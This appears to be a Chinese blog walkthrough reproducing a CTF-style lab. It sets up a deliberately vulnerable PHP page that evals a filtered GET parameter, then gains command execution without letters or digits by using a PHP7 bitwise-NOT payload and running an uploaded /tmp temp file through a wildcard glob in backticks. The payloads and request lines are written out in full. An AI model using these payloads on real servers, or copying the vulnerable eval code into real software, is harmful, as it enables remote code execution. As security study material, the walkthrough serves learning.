无字母数字通过命令执行上传webshell复现

目录
ubuntu配置代码

复现过程:
1.首先访问1.php,会直接显示代码
2.尝试赋予code参数值为1,显示为NO.
3.方法其一,通过PHP7.x特性达成效果
4.接下来要使用burpsuite,所以先打开服务器代理
5.抓取1.php的get请求包
[6.右键选择send to reapeater](#6.右键选择send to reapeater)
7.再选择文件1.txt提交,然后抓post上传文件的格式
8.抓到post传文件包也发送到repeater模块
9.将post内的红框部分复制并粘贴到1.php的get包内
10.注意左上角的get改成POST,最下方的1.txt当时漏了写#!/bin/bash
11.再次填写php表达式发现phpinfo()依旧成功,证明发送包有效
[12.cd /tmp目录下然后ls -al查看临时文件,发现临时文件占9个字符](#12.cd /tmp目录下然后ls -al查看临时文件,发现临时文件占9个字符)
13.shell下可以用.执行任意脚本
14.在1.php最上方加入sleep()函数即可在/tmp文件夹下查看临时文件
15.可以使用CyberChef工具来快速进行url编码
16.临时文件最后一个祖父随机生成大小写还有数字,如图一次大写没有产生
17.如图,最后成功执行了id指令,webshell上传成功

ubuntu配置代码:

首先ubuntu开启nginx服务并vim创建1.php和demo.html2个文件

bash 复制代码
cd /usr/local/nginx/sbin
./nginx 
cd /usr/local/nginx/html
vim 1.php
	<?php
	//sleep(15); #有sleep()情况下执行该php文件可以在/tmp目录下看见产生的临时文件
	if(isset($_GET['code'])){
	    $code = $_GET['code'];
	    if(strlen($code)>35){
 	       die("Long.");
 	   }
	    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
	        die("NO.");
	    }
	    eval($code);
	}else{
	    highlight_file(__FILE__);
	}
vim demo.html
	<!DOCTYPE html>
	<html lang="en">
	<head>
	        <meta charset="UTF-8">
		        <meta name="viewport" content="width=device-width, initial-scale=1.0">
	        <title>Document</title>
	</head>
	<body>
	        <form action="1.php" method="post" enctype="multipart/form-data">
	                <input type="file" name="file" id="">
	                <input type="submit" value="submit">
	        </form>
	</body>
	</html>

1.首先访问1.php,会直接显示代码

2.尝试赋予code参数值为1,显示为NO.

3.方法其一,通过PHP7.x特性达成效果

因为用的php版本为7.x,支持($a)();执行动态函数,所以可以用('phpinfo')();的形式来执行phpinfo()函数,因此只需要构造一个可以生成phpinfo这一串字符串的PHP表达式皆可,payload:(~%8F%97%8F%96%91%99%90)();

4.接下来要使用burpsuite,所以先打开服务器代理

5.抓取1.php的get请求包


6.右键选择send to reapeater

7.再选择文件1.txt提交,然后抓post上传文件的格式

bash 复制代码
#!/bin/bash 
#1.txt内有内容
id


8.抓到post传文件包也发送到repeater模块

9.将post内的红框部分复制并粘贴到1.php的get包内

bash 复制代码
其中一下字段可以删了:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip. deflate, br
Accept-language: zh-CN, zh;q=0.9, en;q=0.8,en-GB;q=0. 7, en-Us;q=0.6
x_ forvarded_ for: 127.0.0.1


10.注意左上角的get改成POST,最下方的1.txt当时漏了写#!/bin/bash

11.再次填写php表达式发现phpinfo()依旧成功,证明发送包有效

12.cd /tmp目录下然后ls -al查看临时文件,发现临时文件占9个字符

且有概率最后一个字符为大写字母,而大写字母在ascii码中位于@和[之间,其他位的字符可以用?来匹配,同时linux系统初始基本上不会产生以大写字母结尾的文件的,所以大写字母可以用[@-[]来匹配。而该临时文件又在tmp文件夹下,所以匹配字段可以是/???/???[@-[]


13.shell下可以用.执行任意脚本

所以可以用. /???/???[@-[]指令来执行临时文件,但是eval()函数作为执行函数只能执行php代码不能执行linux命令,所以要加上``,同时将?、;、@分别unicode编码成%3F、%3B、%40,用+代替空格

如下图:POST /1.php?code=?><?=\`.+/%3f%3f%3f/%3f%3f%3f%3f%3f%3f%3f%3f[%40-[]\`%3b?> HTTP/1.1

14.在1.php最上方加入sleep()函数即可在/tmp文件夹下查看临时文件

15.可以使用CyberChef工具来快速进行url编码

16.临时文件最后一个祖父随机生成大小写还有数字,如图一次大写没有产生

17.如图,最后成功执行了id指令,webshell上传成功

感受:感觉非洲人还是不适合做这个,我随机生成临时文件半天,全是小写字母或者数字,搞得我以为前面做错了,还得排错,愣是卡了20多分钟,最后还是靠着sleep函数,send+cancel不断生成临时文件,最后发现有大写才搞定。

相关推荐
虚拟网络工程师4 分钟前
【网络系统管理】Centos7——配置主从mariadb服务器案例(下半部分)
运维·服务器·网络·数据库·mariadb
爱米的前端小笔记6 分钟前
前端八股自学笔记分享—页面布局(二)
前端·笔记·学习·面试·求职招聘
JosieBook1 小时前
【网络工程】查看自己电脑网络IP,检查网络是否连通
服务器·网络·tcp/ip
黑客Ash2 小时前
计算机中的网络安全
网络·安全·web安全
PersistJiao2 小时前
Spark 分布式计算中网络传输和序列化的关系(二)
大数据·网络·spark·序列化·分布式计算
寒笙LED2 小时前
C++详细笔记(六)string库
开发语言·c++·笔记
岳不谢3 小时前
VPN技术-VPN简介学习笔记
网络·笔记·学习·华为
follycat3 小时前
信息收集--CDN绕过
网络·安全·网络安全
宛唐羁客5 小时前
ODBC连接PostgreSQL数据库后,网卡DOWN后,客户端进程阻塞问题解决方法
网络·数据库
Beekeeper&&P...5 小时前
web钩子什么意思
前端·网络